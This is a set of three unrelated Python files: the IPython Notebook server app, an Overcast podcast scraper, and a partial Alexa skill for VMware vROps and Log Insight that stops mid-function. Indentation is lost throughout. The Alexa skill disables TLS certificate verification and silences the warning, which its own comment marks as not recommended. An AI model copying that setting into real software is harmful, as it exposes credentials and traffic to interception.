# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# stdlib
import errno
import logging
import os
import random
import re
import select
import signal
import socket
import sys
import threading
import time
import uuid
import webbrowser
# Third party
# check for pyzmq 2.1.11
from IPython.utils.zmqrelated import check_for_zmq
check_for_zmq('2.1.11', 'IPython.frontend.html.notebook')
import zmq
from jinja2 import Environment, FileSystemLoader
# Install the pyzmq ioloop. This has to be done before anything else from
# tornado is imported.
from zmq.eventloop import ioloop
ioloop.install()
# check for tornado 2.1.0
msg = "The IPython Notebook requires tornado >= 2.1.0"
try:
import tornado
except ImportError:
raise ImportError(msg)
try:
version_info = tornado.version_info
except AttributeError:
raise ImportError(msg + ", but you have < 1.1.0")
if version_info < (2,1,0):
raise ImportError(msg + ", but you have %s" % tornado.version)
from tornado import httpserver
from tornado import web
# Our own libraries
from IPython.frontend.html.notebook import DEFAULT_STATIC_FILES_PATH
from .kernelmanager import MappingKernelManager
from .handlers import (LoginHandler, LogoutHandler,
ProjectDashboardHandler, NewHandler, NamedNotebookHandler,
MainKernelHandler, KernelHandler, KernelActionHandler, IOPubHandler,
ShellHandler, NotebookRootHandler, NotebookHandler, NotebookCopyHandler,
RSTHandler, AuthenticatedFileHandler, PrintNotebookHandler,
MainClusterHandler, ClusterProfileHandler, ClusterActionHandler,
FileFindHandler, NotebookRedirectHandler,
)
from .nbmanager import NotebookManager
from .filenbmanager import FileNotebookManager
from .clustermanager import ClusterManager
from IPython.config.application import catch_config_error, boolean_flag
from IPython.core.application import BaseIPythonApplication
from IPython.core.profiledir import ProfileDir
from IPython.frontend.consoleapp import IPythonConsoleApp
from IPython.kernel import swallow_argv
from IPython.kernel.zmq.session import Session, default_secure
from IPython.kernel.zmq.zmqshell import ZMQInteractiveShell
from IPython.kernel.zmq.kernelapp import (
kernel_flags,
kernel_aliases,
IPKernelApp
)
from IPython.utils.importstring import import_item
from IPython.utils.localinterfaces import LOCALHOST
from IPython.utils.traitlets import (
Dict, Unicode, Integer, List, Enum, Bool,
DottedObjectName
)
from IPython.utils import py3compat
from IPython.utils.path import filefind
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
_kernel_action_regex = r"(?P<action>restart|interrupt)"
_notebook_id_regex = r"(?P<notebook_id>\w+-\w+-\w+-\w+-\w+)"
_notebook_name_regex = r"(?P<notebook_name>.+\.ipynb)"
_profile_regex = r"(?P<profile>[^\/]+)" # there is almost no text that is invalid
_cluster_action_regex = r"(?P<action>start|stop)"
_examples = """
ipython notebook # start the notebook
ipython notebook --profile=sympy # use the sympy profile
ipython notebook --pylab=inline # pylab in inline plotting mode
ipython notebook --certfile=mycert.pem # use SSL/TLS certificate
ipython notebook --port=5555 --ip=* # Listen on port 5555, all interfaces
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def url_path_join(a,b):
if a.endswith('/') and b.startswith('/'):
return a[:-1]+b
else:
return a+b
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield port + random.randint(-2*n, 2*n)
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class NotebookWebApplication(web.Application):
def __init__(self, ipython_app, kernel_manager, notebook_manager,
cluster_manager, log,
base_project_url, settings_overrides):
handlers = [
(r"/", ProjectDashboardHandler),
(r"/login", LoginHandler),
(r"/logout", LogoutHandler),
(r"/new", NewHandler),
(r"/%s" % _notebook_id_regex, NamedNotebookHandler),
(r"/%s" % _notebook_name_regex, NotebookRedirectHandler),
(r"/%s/copy" % _notebook_id_regex, NotebookCopyHandler),
(r"/%s/print" % _notebook_id_regex, PrintNotebookHandler),
(r"/kernels", MainKernelHandler),
(r"/kernels/%s" % _kernel_id_regex, KernelHandler),
(r"/kernels/%s/%s" % (_kernel_id_regex, _kernel_action_regex), KernelActionHandler),
(r"/kernels/%s/iopub" % _kernel_id_regex, IOPubHandler),
(r"/kernels/%s/shell" % _kernel_id_regex, ShellHandler),
(r"/notebooks", NotebookRootHandler),
(r"/notebooks/%s" % _notebook_id_regex, NotebookHandler),
(r"/rstservice/render", RSTHandler),
(r"/files/(.*)", AuthenticatedFileHandler, {'path' : notebook_manager.notebook_dir}),
(r"/clusters", MainClusterHandler),
(r"/clusters/%s/%s" % (_profile_regex, _cluster_action_regex), ClusterActionHandler),
(r"/clusters/%s" % _profile_regex, ClusterProfileHandler),
]
# Python < 2.6.5 doesn't accept unicode keys in f(**kwargs), and
# base_project_url will always be unicode, which will in turn
# make the patterns unicode, and ultimately result in unicode
# keys in kwargs to handler._execute(**kwargs) in tornado.
# This enforces that base_project_url be ascii in that situation.
#
# Note that the URLs these patterns check against are escaped,
# and thus guaranteed to be ASCII: 'héllo' is really 'h%C3%A9llo'.
base_project_url = py3compat.unicode_to_str(base_project_url, 'ascii')
settings = dict(
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=ipython_app.static_file_path,
static_handler_class = FileFindHandler,
static_url_prefix = url_path_join(base_project_url,'/static/'),
cookie_secret=os.urandom(1024),
login_url=url_path_join(base_project_url,'/login'),
cookie_name='username-%s' % uuid.uuid4(),
base_project_url = base_project_url,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
# prepend base_project_url onto the patterns that we match
new_handlers = []
for handler in handlers:
pattern = url_path_join(base_project_url, handler[0])
new_handler = tuple([pattern]+list(handler[1:]))
new_handlers.append( new_handler )
super(NotebookWebApplication, self).__init__(new_handlers, **settings)
self.kernel_manager = kernel_manager
self.notebook_manager = notebook_manager
self.cluster_manager = cluster_manager
self.ipython_app = ipython_app
self.read_only = self.ipython_app.read_only
self.config = self.ipython_app.config
self.use_less = self.ipython_app.use_less
self.log = log
self.jinja2_env = Environment(loader=FileSystemLoader(os.path.join(os.path.dirname(__file__), "templates")))
#-----------------------------------------------------------------------------
# Aliases and Flags
#-----------------------------------------------------------------------------
flags = dict(kernel_flags)
flags['no-browser']=(
{'NotebookApp' : {'open_browser' : False}},
"Don't open the notebook in a browser after startup."
)
flags['no-mathjax']=(
{'NotebookApp' : {'enable_mathjax' : False}},
"""Disable MathJax
MathJax is the javascript library IPython uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
flags['read-only'] = (
{'NotebookApp' : {'read_only' : True}},
"""Allow read-only access to notebooks.
When using a password to protect the notebook server, this flag
allows unauthenticated clients to view the notebook list, and
individual notebooks, but not edit them, start kernels, or run
code.
If no password is set, the server will be entirely read-only.
"""
)
# Add notebook manager flags
flags.update(boolean_flag('script', 'FileNotebookManager.save_script',
'Auto-save a .py script everytime the .ipynb notebook is saved',
'Do not auto-save .py scripts for every notebook'))
# the flags that are specific to the frontend
# these must be scrubbed before being passed to the kernel,
# or it will raise an error on unrecognized flags
notebook_flags = ['no-browser', 'no-mathjax', 'read-only', 'script', 'no-script']
aliases = dict(kernel_aliases)
aliases.update({
'ip': 'NotebookApp.ip',
'port': 'NotebookApp.port',
'port-retries': 'NotebookApp.port_retries',
'transport': 'KernelManager.transport',
'keyfile': 'NotebookApp.keyfile',
'certfile': 'NotebookApp.certfile',
'notebook-dir': 'NotebookManager.notebook_dir',
'browser': 'NotebookApp.browser',
})
# remove ipkernel flags that are singletons, and don't make sense in
# multi-kernel evironment:
aliases.pop('f', None)
notebook_aliases = [u'port', u'port-retries', u'ip', u'keyfile', u'certfile',
u'notebook-dir']
#-----------------------------------------------------------------------------
# NotebookApp
#-----------------------------------------------------------------------------
class NotebookApp(BaseIPythonApplication):
name = 'ipython-notebook'
default_config_file_name='ipython_notebook_config.py'
description = """
The IPython HTML Notebook.
This launches a Tornado based HTML Notebook Server that serves up an
HTML5/Javascript Notebook client.
"""
examples = _examples
classes = IPythonConsoleApp.classes + [MappingKernelManager, NotebookManager,
FileNotebookManager]
flags = Dict(flags)
aliases = Dict(aliases)
kernel_argv = List(Unicode)
log_level = Enum((0,10,20,30,40,50,'DEBUG','INFO','WARN','ERROR','CRITICAL'),
default_value=logging.INFO,
config=True,
help="Set the log level by value or name.")
# create requested profiles by default, if they don't exist:
auto_create = Bool(True)
# file to be opened in the notebook server
file_to_run = Unicode('')
# Network related information.
ip = Unicode(LOCALHOST, config=True,
help="The IP address the notebook server will listen on."
)
def _ip_changed(self, name, old, new):
if new == u'*': self.ip = u''
port = Integer(8888, config=True,
help="The port the notebook server will listen on."
)
port_retries = Integer(50, config=True,
help="The number of additional ports to try if the specified port is not available."
)
certfile = Unicode(u'', config=True,
help="""The full path to an SSL/TLS certificate file."""
)
keyfile = Unicode(u'', config=True,
help="""The full path to a private key file for usage with SSL/TLS."""
)
password = Unicode(u'', config=True,
help="""Hashed password to use for web authentication.
To generate, type in a python/IPython shell:
from IPython.lib import passwd; passwd()
The string should be of the form type:salt:hashed-password.
"""
)
open_browser = Bool(True, config=True,
help="""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
""")
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
read_only = Bool(False, config=True,
help="Whether to prevent editing/execution of notebooks."
)
use_less = Bool(False, config=True,
help="""Wether to use Browser Side less-css parsing
instead of compiled css version in templates that allows
it. This is mainly convenient when working on the less
file to avoid a build step, or if user want to overwrite
some of the less variables without having to recompile
everything.
You will need to install the less.js component in the static directory
either in the source tree or in your profile folder.
""")
webapp_settings = Dict(config=True,
help="Supply overrides for the tornado.web.Application that the "
"IPython notebook uses.")
enable_mathjax = Bool(True, config=True,
help="""Whether to enable MathJax for typesetting math/TeX
MathJax is the javascript library IPython uses to render math/LaTeX. It is
very large, so you may want to disable it if you have a slow internet
connection, or for offline use of the notebook.
When disabled, equations etc. will appear as their untransformed TeX source.
"""
)
def _enable_mathjax_changed(self, name, old, new):
"""set mathjax url to empty if mathjax is disabled"""
if not new:
self.mathjax_url = u''
base_project_url = Unicode('/', config=True,
help='''The base URL for the notebook server.
Leading and trailing slashes can be omitted,
and will automatically be added.
''')
def _base_project_url_changed(self, name, old, new):
if not new.startswith('/'):
self.base_project_url = '/'+new
elif not new.endswith('/'):
self.base_project_url = new+'/'
base_kernel_url = Unicode('/', config=True,
help='''The base URL for the kernel server
Leading and trailing slashes can be omitted,
and will automatically be added.
''')
def _base_kernel_url_changed(self, name, old, new):
if not new.startswith('/'):
self.base_kernel_url = '/'+new
elif not new.endswith('/'):
self.base_kernel_url = new+'/'
websocket_host = Unicode("", config=True,
help="""The hostname for the websocket server."""
)
extra_static_paths = List(Unicode, config=True,
help="""Extra paths to search for serving static files.
This allows adding javascript/css to be available from the notebook server machine,
or overriding individual files in the IPython"""
)
def _extra_static_paths_default(self):
return [os.path.join(self.profile_dir.location, 'static')]
@property
def static_file_path(self):
"""return extra paths + the default location"""
return self.extra_static_paths + [DEFAULT_STATIC_FILES_PATH]
mathjax_url = Unicode("", config=True,
help="""The url for MathJax.js."""
)
def _mathjax_url_default(self):
if not self.enable_mathjax:
return u''
static_url_prefix = self.webapp_settings.get("static_url_prefix",
"/static/")
try:
mathjax = filefind(os.path.join('mathjax', 'MathJax.js'), self.static_file_path)
except IOError:
if self.certfile:
# HTTPS: load from Rackspace CDN, because SSL certificate requires it
base = u"https://c328740.ssl.cf1.rackcdn.com"
else:
base = u"http://cdn.mathjax.org"
url = base + u"/mathjax/latest/MathJax.js"
self.log.info("Using MathJax from CDN: %s", url)
return url
else:
self.log.info("Using local MathJax from %s" % mathjax)
return static_url_prefix+u"mathjax/MathJax.js"
def _mathjax_url_changed(self, name, old, new):
if new and not self.enable_mathjax:
# enable_mathjax=False overrides mathjax_url
self.mathjax_url = u''
else:
self.log.info("Using MathJax: %s", new)
notebook_manager_class = DottedObjectName('IPython.frontend.html.notebook.filenbmanager.FileNotebookManager',
config=True,
help='The notebook manager class to use.')
trust_xheaders = Bool(False, config=True,
help=("Whether to trust or not X-Scheme/X-Forwarded-Proto and X-Real-Ip/X-Forwarded-For headers"
"sent by the upstream reverse proxy. Neccesary if the proxy handles SSL")
)
def parse_command_line(self, argv=None):
super(NotebookApp, self).parse_command_line(argv)
if argv is None:
argv = sys.argv[1:]
# Scrub frontend-specific flags
self.kernel_argv = swallow_argv(argv, notebook_aliases, notebook_flags)
# Kernel should inherit default config file from frontend
self.kernel_argv.append("--IPKernelApp.parent_appname='%s'" % self.name)
if self.extra_args:
f = os.path.abspath(self.extra_args[0])
if os.path.isdir(f):
nbdir = f
else:
self.file_to_run = f
nbdir = os.path.dirname(f)
self.config.NotebookManager.notebook_dir = nbdir
def init_configurables(self):
# force Session default to be secure
default_secure(self.config)
self.kernel_manager = MappingKernelManager(
config=self.config, log=self.log, kernel_argv=self.kernel_argv,
connection_dir = self.profile_dir.security_dir,
)
kls = import_item(self.notebook_manager_class)
self.notebook_manager = kls(config=self.config, log=self.log)
self.notebook_manager.load_notebook_names()
self.cluster_manager = ClusterManager(config=self.config, log=self.log)
self.cluster_manager.update_profiles()
def init_logging(self):
# This prevents double log messages because tornado use a root logger that
# self.log is a child of. The logging module dipatches log messages to a log
# and all of its ancenstors until propagate is set to False.
self.log.propagate = False
def init_webapp(self):
"""initialize tornado webapp and httpserver"""
self.web_app = NotebookWebApplication(
self, self.kernel_manager, self.notebook_manager,
self.cluster_manager, self.log,
self.base_project_url, self.webapp_settings
)
if self.certfile:
ssl_options = dict(certfile=self.certfile)
if self.keyfile:
ssl_options['keyfile'] = self.keyfile
else:
ssl_options = None
self.web_app.password = self.password
self.http_server = httpserver.HTTPServer(self.web_app, ssl_options=ssl_options,
xheaders=self.trust_xheaders)
if not self.ip:
warning = "WARNING: The notebook server is listening on all IP addresses"
if ssl_options is None:
self.log.critical(warning + " and not using encryption. This"
"is not recommended.")
if not self.password and not self.read_only:
self.log.critical(warning + "and not using authentication."
"This is highly insecure and not recommended.")
success = None
for port in random_ports(self.port, self.port_retries+1):
try:
self.http_server.listen(port, self.ip)
except socket.error as e:
# XXX: remove the e.errno == -9 block when we require
# tornado >= 3.0
if e.errno == -9 and tornado.version_info[0] < 3:
# The flags passed to socket.getaddrinfo from
# tornado.netutils.bind_sockets can cause "gaierror:
# [Errno -9] Address family for hostname not supported"
# when the interface is not associated, for example.
# Changing the flags to exclude socket.AI_ADDRCONFIG does
# not cause this error, but the only way to do this is to
# monkeypatch socket to remove the AI_ADDRCONFIG attribute
saved_AI_ADDRCONFIG = socket.AI_ADDRCONFIG
self.log.warn('Monkeypatching socket to fix tornado bug')
del(socket.AI_ADDRCONFIG)
try:
# retry the tornado call without AI_ADDRCONFIG flags
self.http_server.listen(port, self.ip)
except socket.error as e2:
e = e2
else:
self.port = port
success = True
break
# restore the monekypatch
socket.AI_ADDRCONFIG = saved_AI_ADDRCONFIG
if e.errno != errno.EADDRINUSE:
raise
self.log.info('The port %i is already in use, trying another random port.' % port)
else:
self.port = port
success = True
break
if not success:
self.log.critical('ERROR: the notebook server could not be started because '
'no available port could be found.')
self.exit(1)
def init_signal(self):
if not sys.platform.startswith('win'):
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
# FIXME: remove this delay when pyzmq dependency is >= 2.1.11
time.sleep(0.1)
info = self.log.info
info('interrupted')
print self.notebook_info()
sys.stdout.write("Shutdown this notebook server (y/[n])? ")
sys.stdout.flush()
r,w,x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith('y'):
self.log.critical("Shutdown confirmed")
ioloop.IOLoop.instance().stop()
return
else:
print "No answer for 5s:",
print "resuming operation..."
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
ioloop.IOLoop.instance().add_callback(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical("received signal %s, stopping", sig)
ioloop.IOLoop.instance().stop()
def _signal_info(self, sig, frame):
print self.notebook_info()
@catch_config_error
def initialize(self, argv=None):
self.init_logging()
super(NotebookApp, self).initialize(argv)
self.init_configurables()
self.init_webapp()
self.init_signal()
def cleanup_kernels(self):
"""Shutdown all kernels.
The kernels will shutdown themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
self.log.info('Shutting down kernels')
self.kernel_manager.shutdown_all()
def notebook_info(self):
"Return the current working directory and the server url information"
mgr_info = self.notebook_manager.info_string() + "\n"
return mgr_info +"The IPython Notebook is running at: %s" % self._url
def start(self):
""" Start the IPython Notebok server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
ip = self.ip if self.ip else '[all ip addresses on your system]'
proto = 'https' if self.certfile else 'http'
info = self.log.info
self._url = "%s://%s:%i%s" % (proto, ip, self.port,
self.base_project_url)
for line in self.notebook_info().split("\n"):
info(line)
info("Use Control-C to stop this server and shut down all kernels.")
if self.open_browser or self.file_to_run:
ip = self.ip or LOCALHOST
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warn('No web browser found: %s.' % e)
browser = None
if self.file_to_run:
name, _ = os.path.splitext(os.path.basename(self.file_to_run))
url = self.notebook_manager.rev_mapping.get(name, '')
else:
url = ''
if browser:
b = lambda : browser.open("%s://%s:%i%s%s" % (proto, ip,
self.port, self.base_project_url, url), new=2)
threading.Thread(target=b).start()
try:
ioloop.IOLoop.instance().start()
except KeyboardInterrupt:
info("Interrupted...")
finally:
self.cleanup_kernels()
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
def launch_new_instance():
app = NotebookApp.instance()
app.initialize()
app.start()
|
overcast.py
|
"""
An overcast "API".
Overcast doesn't really offer an official API, so this just sorta apes it.
"""
import requests
import lxml.html
import urlparse
import utilities
import logging
import threading
log = logging.getLogger('overcast-sonos')
class Overcast(object):
def __init__(self, email, password):
self.session = requests.session()
r = self.session.post('https://overcast.fm/login', {'email': email, 'password': password})
doc = lxml.html.fromstring(r.content)
alert = doc.cssselect('div.alert')
if alert:
raise Exception("Can't login: {}".format(alert[0].text_content().strip()))
def _get_html(self, url):
return lxml.html.fromstring(self.session.get(url).content.replace('\n', '').replace(' ', '').replace(' ', ''))
def get_active_episodes(self, get_details=False):
active_episodes = []
active_episodes_dictionary = {}
doc = self._get_html('https://overcast.fm/podcasts')
for index, cell in enumerate(doc.cssselect('a.episodecell')):
if 'href' in cell.attrib:
if get_details:
episode_id = cell.attrib['href']
time_remaining_seconds = self.get_episode_time_remaining_seconds_from_episode_cell(cell, False)
t = threading.Thread(target=self.add_episode_detail_to, args=(active_episodes_dictionary, index, episode_id, time_remaining_seconds))
t.setDaemon(True)
t.start()
else:
active_episodes.append({
'id': urlparse.urljoin('https://overcast.fm', cell.attrib['href']).lstrip('/'),
'title': cell.cssselect('div.titlestack div.caption2')[0].text_content(),
'audio_type': 'audio/mpeg',
'podcast_title': cell.cssselect('div.titlestack div.title')[0].text_content(),
'albumArtURI': cell.cssselect('img')[0].attrib['src'],
'duration': -1,
})
main_thread = threading.currentThread()
for t in threading.enumerate():
if t is not main_thread:
log.debug('''Joining on thread %s''', t.getName())
t.join()
if not active_episodes:
active_episodes = [active_episodes_dictionary[key] for key in sorted(active_episodes_dictionary)]
return active_episodes
def add_episode_detail_to(self, ordered_episodes, key, episode_id, time_remaining_seconds=None):
ordered_episodes[key] = self.get_episode_detail(episode_id, time_remaining_seconds)
def get_episode_detail(self, episode_id, time_remaining_seconds=None):
episode_href = urlparse.urljoin('https://overcast.fm', episode_id)
doc = self._get_html(episode_href)
time_elapsed_seconds = int(doc.cssselect('audio#audioplayer')[0].attrib['data-start-time'])
time_remaining_seconds = time_remaining_seconds or self.get_episode_time_remaining_seconds(episode_id, doc)
if time_elapsed_seconds is None or time_remaining_seconds is None:
duration = -1
else:
duration = time_elapsed_seconds + time_remaining_seconds
if time_elapsed_seconds == duration:
duration = -1
return {
'id': episode_href.lstrip('/'),
'title': doc.cssselect('div.centertext h2')[0].text_content(),
'podcast_title': doc.cssselect('div.centertext h3 a')[0].text_content(),
'offsetMillis': time_elapsed_seconds * 1000,
'duration': duration,
'data_item_id': doc.cssselect('audio#audioplayer')[0].attrib['data-item-id'],
'data_sync_version': doc.cssselect('audio#audioplayer')[0].attrib['data-sync-version'],
'albumArtURI': doc.cssselect('div.fullart_container img')[0].attrib['src'],
'parsed_audio_uri': doc.cssselect('audio#audioplayer source')[0].attrib['src'],
'audio_type': doc.cssselect('audio#audioplayer source')[0].attrib['type'],
'delete_episode_uri': doc.cssselect('a#delete_episode_button')[0].attrib['href']
}
def get_episode_time_remaining_seconds(self, episode_id, episode_html):
log.debug('''getting the remaining time. episode id is %s''', episode_id)
podcast_id = episode_html.cssselect('div.centertext h3 a')[0].attrib['href']
podcast_href = urlparse.urljoin('https://overcast.fm', podcast_id)
doc = self._get_html(podcast_href)
for cell in doc.cssselect('a.extendedepisodecell'):
if episode_id in cell.attrib['href']:
return self.get_episode_time_remaining_seconds_from_episode_cell(cell, True)
def get_episode_time_remaining_seconds_from_episode_cell(self, cell, is_extended_cell):
#unparsed_time_remaining_index = 1 if is_extended_cell else 2
unparsed_time_remaining = cell.cssselect('div.titlestack div.caption2')[0].text_content()
time_remaining_seconds = utilities.duration_in_seconds(unparsed_time_remaining)
return time_remaining_seconds
def get_all_podcasts(self):
doc = self._get_html('https://overcast.fm/podcasts')
return [
{
'id': cell.attrib['href'].lstrip('/'),
'title': cell.cssselect('div.title')[0].text_content(),
'albumArtURI': cell.cssselect('img')[0].attrib['src'],
}
for cell in doc.cssselect('a.feedcell')
if 'href' in cell.attrib
]
def get_all_podcast_episodes(self, podcast_id):
"""
get all episodes (played or not) for a podcast.
"""
podcast_href = urlparse.urljoin('https://overcast.fm', podcast_id)
doc = self._get_html(podcast_href)
albumArtURI = doc.cssselect('img.art')[0].attrib['src']
podcast_title = doc.cssselect('h2.centertext')[0].text_content()
return [
# NOTE: If the hardcoded audio_type causes any problems, just uncomment the line below and comment out the dictionary below it.
# self.get_episode_detail(cell.attrib['href'])
{
'id': urlparse.urljoin('https://overcast.fm', cell.attrib['href']).lstrip('/'),
'title': cell.cssselect('div.titlestack div.title')[0].text_content(),
'audio_type': 'audio/mpeg',
'podcast_title': podcast_title,
'albumArtURI': albumArtURI,
}
for cell in doc.cssselect('a.extendedepisodecell')
if 'href' in cell.attrib
]
def update_episode_offset(self, episode, updated_offset_seconds):
log.debug("updated_offset_seconds = %d and duration = %d", updated_offset_seconds, episode['duration'])
url = 'https://overcast.fm/podcasts/set_progress/' + episode['data_item_id']
params = {'p': updated_offset_seconds, 'speed': 0, 'v': episode['data_sync_version']}
log.debug('Updating offset of episode with id %s to %d', episode['id'], updated_offset_seconds)
self.session.post(url, params)
if updated_offset_seconds >= episode['duration'] - 30:
self.delete_episode(episode)
def delete_episode(self, episode):
url = 'https://overcast.fm' + episode['delete_episode_uri']
log.debug('Deleting episode with id %s', episode['id'])
self.session.post(url)
|
vrobbie.py
|
#!/usr/bin/python
import json
import logging
import requests
import collections
import time
import re
import sys
import os
from threading import Thread
from operator import itemgetter
from itertools import groupby
from flask import Flask, render_template
from flask_ask import Ask, statement, question, session, request, context, version
# Vars and Configurations
bearertoken = ""
# Edit with IP or FQDN of vrops and LI node
vropsHost = ""
liHost = ""
# Authentication is intially via credentials set. Subsequent calls use a
# bearer token.
vropsuser = ""
vropspassword = ""
vropsauthsource = "local"
liprovider = "ActiveDirectory"
liusername = ""
lipassword = ""
# For some labs, using self-signed will result in error during request due to cert check
# flip this flag to False to bypass certificate checking in those cases. I have suppressed the warning
# normally thrown by urllib3 but this is NOT RECOMMENDED!
verify = False
if not verify:
requests.packages.urllib3.disable_warnings()
app = Flask(__name__)
ask = Ask(app,"/")
logging.getLogger("flask_ask").setLevel(logging.DEBUG)
##############################################
# HELPERS
# - Fetchers
# - Handling voice service errors
# - Parsing and preparing response_msg
##############################################
def datacenter_report():
while True:
dc_report_dict = dict()
token = json.loads(liGetToken(liusername, lipassword, liprovider))
dc_report_dict["vMotions"] = json.loads(loginsightQuery("timestamp/LAST 86400000", "bin-width=all&aggregation-function=UCOUNT&aggregation-field=com.vmware.vsphere:vmw_hostd_vmotion_id", token["sessionId"]))
dc_report_dict["DRS vMotions"] = json.loads(loginsightQuery("timestamp/LAST 86400000/text/CONTAINS DrmExecuteVMotionLRO", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["VMs Created"] = json.loads(loginsightQuery("timestamp/LAST 86400000/vc_event_type/CONTAINS com.vmware.vim25.VmCreatedEvent/vc_event_type/CONTAINS com.vmware.vim25.vmclonedevent", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["VMs Deleted"] = json.loads(loginsightQuery("timestamp/LAST 86400000/vc_event_type/CONTAINS com.vmware.vim25.VmRemovedEvent", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
dc_report_dict["RConsole Sessions"] = json.loads(loginsightQuery("timestamp/LAST 86400000/text/CONTAINS Local connection for mks established", "bin-width=all&aggregation-function=COUNT", token["sessionId"]))
with open("prefetch/dcreport", 'w') as outfile:
json.dump(dc_report_dict, outfile)
print "dcreport updated at " + time.strftime("%Y-%m-%d %H:%M:%S")
time.sleep(300)
def more_info():
#Called when user wants more information on the impacted resource from the Alerts tree
if session.attributes["CurrentTree"] == "Alerts":
resource = vropsRequest("api/resources/"+session.attributes["CurrentObject"],"GET")
alertsQueryPayload = {
'resource-query': {
'resourceId': [session.attributes["CurrentObject"]]
},
'activeOnly': True
}
resourceAlerts = vropsRequest("api/alerts/query","POST",payload=alertsQueryPayload)
resourceName = resource["resourceKey"]["name"]
resourceHealth = resource["resourceHealth"]
resourceAlertCount = resourceAlerts["pageInfo"]["totalCount"]
outputSpeech = "The resource; {0}; is; {1}; for health status. There are {2} alerts associated with this resource. Shall I read those alerts?".format(resourceName, resourceHealth, resourceAlertCount)
with open("sessionData/"+session.sessionId+"resAlerts", 'w') as outfile:
json.dump(resourceAlerts, outfile)
session.attributes["ResAlertsIndex"] = 0
session.attributes["CurrentTree"] = "Resource"
return outputSpeech
#Called when user wants more information on an alert from the Resource tree
if session.attributes["CurrentTree"] == "Resource":
alert = vropsRequest("api/alerts/"+session.attributes["CurrentAlert"],"GET")
alertDef = vropsRequest("api/alertdefinitions/"+alert["alertDefinitionId"],"GET")
alertDesc = alertDef["description"]
recommendations=alertDef["states"][0]["recommendationPriorityMap"]
if (len(recommendations) == 1):
recQualifier = "only"
else:
recQualifier = "first"
recDesc = vropsRequest("api/recommendations/"+recommendations.keys()[0],"GET")
outputSpeech = "{0}. The {1} recommendation is as follows; {2}".format(alertDesc, recQualifier, recDesc["description"])
return outputSpeech
#Called when user wants more information on groups of alerts for a definition
if session.attributes["CurrentTree"] == "GroupedAlerts":
payload = json.loads('{"resourceId":'+ json.dumps(session.attributes["impactedResources"]) +'}')
resources = vropsRequest("api/resources/query","POST",payload=payload)
resourceList = resources["resourceList"]
resourceDict = {}
for res in resourceList:
resourceDict[res["resourceKey"]["name"]] = res["identifier"]
session.attributes["resourceDict"] = resourceDict
outputSpeech = ""
return outputSpeech
def continues():
if session.attributes["CurrentTree"] == "Alerts":
with open("sessionData/"+session.sessionId+"badgeAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
criticalAlerts = alerts_by_sev(alerts,"CRITICAL")
alert = criticalAlerts[session.attributes["AlertsIndex"]]
alertDefinition = alert["alertDefinitionName"]
resource = vropsRequest(alert["links"][1]["href"][10:] ,"GET")
resourceName = resource["resourceKey"]["name"]
if (len(criticalAlerts)-1 == session.attributes["AlertsIndex"]):
outputSpeech = "The resource; {0}; has a critical alert, {1}. There are no more cirtical alerts. Would you like more information on this resource?".format(resourceName, alertDefinition)
else:
outputSpeech = "The resource; {0}; has a critical alert, {1}. Next alert or more information on this resource?".format(resourceName, alertDefinition)
session.attributes["AlertsIndex"] += 1
session.attributes["CurrentObject"] = resource["identifier"]
return outputSpeech
if session.attributes["CurrentTree"] == "GroupedAlerts":
with open("sessionData/"+session.sessionId+"groupAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
definition = alerts[session.attributes["AlertsIndex"]]
alertDefinition = definition[0]["alertDefinitionName"]
impactedResources = []
for res in definition:
impactedResources.append(res["resourceId"])
session.attributes["impactedResources"] = impactedResources
session.attributes["alertDefinition"] = alertDefinition
numOfResources = len(definition)
if numOfResources == 1:
resourceText = "resource is"
else:
